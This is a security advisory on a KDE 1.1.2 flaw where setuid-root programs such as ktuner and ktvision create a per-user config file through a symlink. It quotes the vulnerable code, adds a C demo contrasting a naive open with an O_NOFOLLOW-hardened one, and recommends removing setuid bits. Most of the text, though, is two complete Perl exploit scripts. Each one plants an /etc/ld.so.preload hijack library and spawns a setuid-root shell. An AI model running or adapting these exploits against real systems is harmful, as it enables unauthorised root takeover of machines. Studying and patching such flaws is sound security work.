KDE KApplication Configuration File Security Vulnerability
Published: 2000-06-01
Updated: 2000-06-02
Affected systems:
KDE 1.1.2 + SuSE 6.4
Description:
KDE has a security vulnerability in the way it handles configuration files: the KApplication class does not create the per-application configuration file safely. A local user who runs a setuid-root KDE program (for example ktvision or ktuner) can therefore create arbitrary files, which can lead to root privileges.
The problematic code is in the KApplication class, in KApplication::init():
...
// now for the local app config file
QString aConfigName = KApplication::localkdedir();
aConfigName += "/share/config/";
aConfigName += aAppName;
aConfigName += "rc";
QFile aConfigFile( aConfigName );
...
Nothing in this code path checks whether the file it is about to create is a symbolic link. aConfigName lies under the user's own KDE directory, so a local user can replace the rc file with a link to any path; when a setuid-root KDE program then opens it, the link is followed with root privileges. The user can thereby create or truncate arbitrary system files, for example a shared-library preload list, and from there gain control of the system.
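The following C program is an added example; it is not part of the advisory and not KDE's code. It reproduces the pattern in a throwaway directory: an opener that behaves like the QFile open in KApplication::init() (follows a symlink in the final path component and creates the file with the process's mode and umask) next to a hardened opener that passes O_NOFOLLOW so the kernel refuses the symlink atomically, with no lstat-then-open race. The scratch directory, the file names and the "target" file standing in for /etc/ld.so.preload are constructed for the demo.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern, equivalent to the QFile open in KApplication::init():
 * open() follows a symlink in the final path component, so a setuid-root
 * caller creates or truncates whatever the link points to, with mode
 * 0666 & ~umask (0666 when the attacker set umask 0 before exec). */
int open_rc_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened opener. O_NOFOLLOW makes the kernel fail with ELOOP when the
 * final component is a symlink; this is atomic, unlike an lstat() check
 * followed by open(). Mode 0600 does not depend on the caller's umask,
 * and the fstat() rejects anything that is not a regular file. */
int open_rc_safe(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;                      /* errno == ELOOP for a symlink */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode)) {
        close(fd);
        errno = EINVAL;
        return -1;
    }
    return fd;
}

/* Constructed scenario: a scratch directory holds "apprc" (the attacker's
 * symlink, like ~/.kde/share/config/ktunerrc) pointing at "target" (a
 * hypothetical stand-in for /etc/ld.so.preload). Returns 1 when the unsafe
 * opener created the target through the link, the safe opener refused the
 * link with ELOOP, and the safe opener still works on a plain path. */
int demo(void)
{
    char dir[] = "/tmp/kapp-demo-XXXXXX";
    char target[512], rc[512];
    int fd, unsafe_followed, safe_refused, safe_plain_ok = 0;
    struct stat st;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(rc, sizeof rc, "%s/apprc", dir);
    if (symlink(target, rc) != 0)
        return -1;

    fd = open_rc_unsafe(rc);            /* follows the link: target appears */
    unsafe_followed = fd >= 0 && access(target, F_OK) == 0;
    if (fd >= 0)
        close(fd);
    unlink(target);

    fd = open_rc_safe(rc);              /* refuses the link with ELOOP */
    safe_refused = fd < 0 && errno == ELOOP;
    if (fd >= 0)
        close(fd);

    unlink(rc);                         /* now a plain, non-link path */
    fd = open_rc_safe(rc);
    if (fd >= 0) {
        safe_plain_ok = fstat(fd, &st) == 0 && (st.st_mode & 0777) == 0600;
        close(fd);
        unlink(rc);
    }
    rmdir(dir);
    return unsafe_followed && safe_refused && safe_plain_ok;
}

int main(void)
{
    int ok = demo();
    printf("unsafe opener followed the link, safe opener refused it: %s\n",
           ok == 1 ? "yes" : "no");
    return ok == 1 ? 0 : 1;
}
```

O_NOFOLLOW only protects the final component: if the attacker replaces ~/.kde/share/config itself with a symlink to /etc, the file is still created in the wrong place with the right name. A setuid program should therefore also drop to the real user (seteuid(getuid())) before touching anything under $HOME, or, as the advisory's workaround says, not be setuid at all.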
<* Source: Sebastian "Stealth" Krahmer / TESO
http://www.cs.uni-potsdam.de/homepages/students/linuxer/
http://teso.scene.at/
*>
Test method:
WARNING
The following programs (methods) may be offensive in nature and are provided for security research and teaching only. Use at your own risk!
#!/usr/bin/perl
#
# 7350ktuner! The ktuner-hack.
# (a.k.a. kil3r for some reason :)
#
# Just execute. Gives instant rootshell kiddie!
# If only ktuner is setuid-root and vulnerable as with
# SuSE 6.4!
#
# When has this stupid race an end?
#
# Bugdiscovery is due to Sebastian Krahmer.
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
#
# Greets as always to TESO, security.is, lam3rz ... you all
# know who you are.
#
#
# The per-application rc file that KApplication::init() creates under
# our own $HOME/.kde, as root when ktuner is setuid.
my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktunerrc";
$ENV{"PATH"}.=":/opt/kde/bin";
print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";
print "Creating hijack-lib ...\n";
# Library to be listed in /etc/ld.so.preload: it replaces time(), which
# /usr/bin/passwd calls, so the body runs as root inside passwd.
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>
int time(void *v)
{
chown("/tmp/boomsh", 0, 0);
chmod("/tmp/boomsh", 06755);
unlink("/etc/ld.so.preload");
exit(1);
}
_EOF_
close O;
print "Compiling hijack-lib ...\n";
`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
`cc -shared /tmp/boom.o -o /tmp/boom.so`;
# The shell that boom.so makes setuid-root.
open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
#include <unistd.h>
int main()
{
char *a[] = {"/bin/sh", 0};
setuid(0); setregid(0, 0);
execve(a[0], a, 0);
return 0;
}
_EOF2_
close O;
print "Compile shell ...\n";
`cc /tmp/boomsh.c -o /tmp/boomsh`;
# ktuner inherits umask 0, so the file root creates through our symlink
# ends up mode 0666: world-writable, including by us.
umask 0;
unlink $rcfile;
symlink "/etc/ld.so.preload", $rcfile;
print "Invoking vulnerable program (ktuner)...\n";
if (fork() == 0) {
`ktuner`;
exit 0;
} else {
# Give ktuner time to reach KApplication::init() and create the file,
# then kill it; we only needed the open(), not the GUI.
sleep(3);
kill 9, split ' ', `pidof ktuner`;
}
# /etc/ld.so.preload now exists and is writable by us; point it at our lib.
open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;
# Any setuid-root binary that calls time() now runs the hook; passwd does.
`/usr/bin/passwd`;
# let it look like if we have sth. to do. :)
sleep 3;
print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");
========================= 7350ktuner end ================================
========================= 7350ktvision begin ================================
#!/usr/bin/perl
#
# 7350ktvision! The ktvision-hack.
#
# Just execute. Gives instant rootshell kiddie!
# If only ktvision is setuid-root and vulnerable as with
# SuSE 6.4!
#
#
# Bugdiscovery is due to Sebastian Krahmer.
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
# Greets as always to TESO, security.is, lam3rz ... you all
# know who you are.
#
# Special greets to that beautiful black-dressed woman at
# the bus stop. This one is for you. :)
#
# The per-application rc file that KApplication::init() creates under
# our own $HOME/.kde, as root when ktvision is setuid.
my $rcfile = $ENV{"HOME"}."/.kde/share/config/ktvisionrc";
$ENV{"PATH"}.=":/opt/kde/bin";
print ">>Get a feeling on GUI's and how secure they are.<< Stealth.\n";
print "Creating hijack-lib ...\n";
# Library to be listed in /etc/ld.so.preload: it replaces time(), which
# /usr/bin/passwd calls, so the body runs as root inside passwd.
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>
#include <sys/stat.h>
#include <stdlib.h>
#include <unistd.h>
int time(void *v)
{
chown("/tmp/boomsh", 0, 0);
chmod("/tmp/boomsh", 06755);
unlink("/etc/ld.so.preload");
exit(1);
}
_EOF_
close O;
print "Compiling hijack-lib ...\n";
`cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
`cc -shared /tmp/boom.o -o /tmp/boom.so`;
# The shell that boom.so makes setuid-root.
open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
#include <unistd.h>
int main()
{
char *a[] = {"/bin/sh", 0};
setuid(0); setregid(0, 0);
execve(a[0], a, 0);
return 0;
}
_EOF2_
close O;
print "Compile shell ...\n";
`cc /tmp/boomsh.c -o /tmp/boomsh`;
# ktvision inherits umask 0, so the file root creates through our symlink
# ends up mode 0666: world-writable, including by us.
umask 0;
unlink $rcfile;
symlink "/etc/ld.so.preload", $rcfile;
print "Invoking vulnerable program (ktvision)...\n";
if (fork() == 0) {
`ktvision`;
exit 0;
} else {
# Give ktvision time to reach KApplication::init() and create the file,
# then kill it; we only needed the open(), not the GUI.
sleep(3);
kill 9, split ' ', `pidof ktvision`;
}
# /etc/ld.so.preload now exists and is writable by us; point it at our lib.
open O, ">/etc/ld.so.preload" or die "Huh? Can't open preload.";
print O "/tmp/boom.so";
close O;
# Any setuid-root binary that calls time() now runs the hook; passwd does.
`/usr/bin/passwd`;
# let it look like if we have sth. to do. :)
sleep 3;
print "Welcome. But as always: BEHAVE!\n";
system("/tmp/boomsh");
========================= 7350ktvision end =============================
Recommendation:
Temporary workaround:
Remove the setuid/setgid bits from all KDE programs (on SuSE 6.4 this includes ktuner and ktvision). They then open the rc file as the invoking user, and the symlink no longer gains anything.